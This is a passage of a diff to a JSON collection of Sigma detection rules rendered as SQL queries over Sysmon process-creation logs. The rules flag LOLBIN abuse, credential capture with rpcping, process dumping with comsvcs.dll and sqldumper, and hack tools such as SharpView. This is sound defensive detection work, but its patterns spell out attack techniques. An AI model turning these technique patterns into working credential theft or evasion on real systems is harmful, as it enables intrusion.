'%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR 
Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_webshell_hacking.yml" + "filename": "proc_creation_win_susp_manageengine_pattern.yml" }, { - "title": "Disable Important Scheduled Task", - "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", + "title": "Wlrmdr Lolbin Use as Launcher", + "id": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", "status": "experimental", - "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute", + "author": "frack113, manasmbellani", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE 
'\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR (((Image LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR OriginalFileName = 'WLRMNDR.EXE') AND (CommandLine LIKE '%-s %' ESCAPE '\\' AND CommandLine LIKE '%-f %' ESCAPE '\\' AND CommandLine LIKE '%-t %' ESCAPE '\\' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\') OR (ParentImage = '-')))))" ], - "filename": "proc_creation_win_schtasks_disable.yml" + "filename": "proc_creation_win_lolbin_wlrmdr.yml" }, { - "title": "Suspicious ZipExec Execution", - "id": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", - "status": "test", - "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", - "author": "frack113", + "title": "Suspicious Rundll32 Script in CommandLine", + "id": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", + "status": "experimental", + "description": "Detects suspicious process related to rundll32 based on arguments", + "author": "frack113, Zaw Min Htun (ZETA)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "medium", "rule": [ 
- "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%/generic:Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/user:%' ESCAPE '\\') OR (CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32%' ESCAPE '\\' AND (CommandLine LIKE '%mshtml,RunHTMLApplication%' ESCAPE '\\' OR CommandLine LIKE '%mshtml,#135%' ESCAPE '\\') AND (CommandLine LIKE '%javascript:%' ESCAPE '\\' OR CommandLine LIKE '%vbscript:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_zipexec.yml" + "filename": "proc_creation_win_rundll32_script_run.yml" }, { - "title": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN", - "id": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", - "status": "test", - "description": "dotnet.exe will execute any DLL and execute unsigned code", - "author": "Beyu Denis, oscd.community", + "title": "Suspicious Registration via cscript.exe", + "id": "28c8f68b-098d-45af-8d43-8089f3e35403", + "status": "experimental", + "description": "Detects when the registration of a VSS/VDS Provider as a COM+ application.", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.t1218" ], "falsepositives": [ - "System administrator Usage" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dotnet.exe' ESCAPE '\\' OR OriginalFileName = '.NET Host') AND (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.csproj' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.22000.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.19041.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.17763.0\\\\x64%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_dotnet.yml" + "filename": "proc_creation_win_regsvr32_registration_via_cscript.yml" }, { - "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", - "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", + "title": "Suspicious Usage Of ShellExec_RunDLL", + "id": "d87bd452-6da1-456e-8155-7dc988157b7d", "status": "experimental", - "description": "Detects usage of cmdkey to look for cached credentials on the system", - "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1003.005" + "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR 
CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmdkey_recon.yml" + "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" }, { - "title": "Hidden Powershell in Link File Pattern", - "id": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", + "title": "Capture Credentials with Rpcping.exe", + "id": "93671f99-04eb-4ab4-a161-70d446a84003", "status": "test", - "description": "Detects events that appear when a user click on a link file with a powershell command in it", - "author": "frack113", + "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Legitimate commands in .lnk files" + "Unlikely" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.lnk%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rpcping.exe' ESCAPE '\\' AND (CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/s%' ESCAPE '\\')) AND ((CommandLine LIKE '%-u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%/u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%-t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\') OR (CommandLine LIKE '%/t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' 
ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_embed_exe_lnk.yml" + "filename": "proc_creation_win_rpcping_credential_capture.yml" }, { - "title": "Potential Persistence Via Netsh Helper DLL", - "id": "56321594-9087-49d9-bf10-524fe8479452", + "title": "Hiding Files with Attrib.exe", + "id": "4281cb20-2994-4580-aa63-c8b86d019934", "status": "test", - "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", - "author": "Victor Sergeev, oscd.community", + "description": "Detects usage of attrib.exe to hide files from users.", + "author": "Sami Ruohonen", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.007", - "attack.s0108" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ - "Unknown" + "IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)", + "Msiexec.exe hiding desktop.ini" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +h %' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\desktop.ini %' ESCAPE '\\') OR (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '+R +H +S +A \\\\\\*.cui' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\\\*.bat' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" + "filename": 
"proc_creation_win_attrib_hiding_files.yml" }, { - "title": "HackTool - TruffleSnout Execution", - "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", - "status": "experimental", - "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", - "author": "frack113", + "title": "Renamed ProcDump Execution", + "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", + "status": "test", + "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Procdump illegaly bundled with legitimate software", + "Administrators who rename binaries (should be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'TruffleSnout.exe' OR Image LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_trufflesnout.yml" + "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" }, { - "title": "Suspicious Shells Spawn by SQL Server", - "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", - "status": "experimental", - "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", - "author": "FPT.EagleEye Team, wagga", + "title": "Dumping Process via 
Sqldumper.exe", + "id": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", + "status": "test", + "description": "Detects process dump via legitimate sqldumper.exe binary", + "author": "Kirill Kiryanov, oscd.community", "tags": [ - "attack.t1505.003", - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.credential_access", + "attack.t1003.001" ], - "level": "high", + "falsepositives": [ + "Legitimate MSSQL Server actions" + ], + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentImage LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sqldumper.exe' ESCAPE '\\' AND (CommandLine LIKE '%0x0110%' ESCAPE '\\' OR CommandLine LIKE '%0x01100:40%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mssql_susp_child_process.yml" + "filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml" }, { - "title": "Suspicious Schtasks Execution AppData Folder", - "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", + "title": "HackTool - SharpView Execution", + "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", "status": "experimental", - "description": "Detects the creation of a schtask that executes a file from 
C:\\Users\\\\AppData\\Local", - "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "author": "frack113", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.discovery", + "attack.t1049", + "attack.t1069.002", + "attack.t1482", + "attack.t1135", + "attack.t1033" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'SharpView.exe' OR Image LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE 
'%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' 
OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_schtasks_appdata_local_system.yml" + "filename": "proc_creation_win_hktl_sharpview.yml" }, { - "title": "HackTool - SharpChisel Execution", - "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", + "title": "Gpscript Execution", + "id": "1e59c230-6670-45bf-83b0-98903780607e", "status": "experimental", - "description": "Detects usage of the Sharp Chisel via the commandline arguments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1090.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Legitimate uses of logon scripts distributed via group policy" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gpscript.exe' ESCAPE '\\' OR OriginalFileName = 'GPSCRIPT.EXE') AND (CommandLine LIKE '% /logon%' ESCAPE '\\' OR CommandLine LIKE '% /startup%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharp_chisel.yml" + "filename": "proc_creation_win_lolbin_gpscript.yml" }, { - "title": "Esentutl Gather Credentials", - "id": "7df1713a-1a5b-4a4b-a071-dc83b144a101", + "title": "Sdclt Child Processes", + "id": "da2738f2-fadb-4394-afa7-0a0674885afa", "status": "test", - "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", - "author": "sam0x90", + "description": "A General detection for sdclt spawning new processes. 
This could be an indicator of sdclt being used for bypass UAC techniques.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.003" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "To be determined" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%esentutl%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sdclt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_esentutl_params.yml" + "filename": "proc_creation_win_sdclt_child_process.yml" }, { - "title": "Wusa Extracting Cab Files", - "id": "59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9", + "title": "Process Reconnaissance Via Wmic.EXE", + "id": "221b251a-357a-49a9-920a-271802777cc0", "status": "experimental", - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. 
This could indicate an attacker using an old technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of \"wmic\" with the \"process\" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.", + "author": "frack113", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "The \"extract\" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%process%' ESCAPE '\\') AND NOT (CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wusa_cab_files_extraction.yml" + "filename": "proc_creation_win_wmic_recon_process.yml" }, { - "title": "DLL Loaded via CertOC.EXE", - "id": "242301bc-f92f-4476-8718-78004a6efd9f", - "status": "experimental", - "description": "Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.", - "author": "Austin Songer @austinsonger", + "title": "Process Dumping Via Comsvcs.DLL", + "id": "646ea171-dded-4578-8a4d-65e9822892e3", + "status": "test", + "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", + "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + 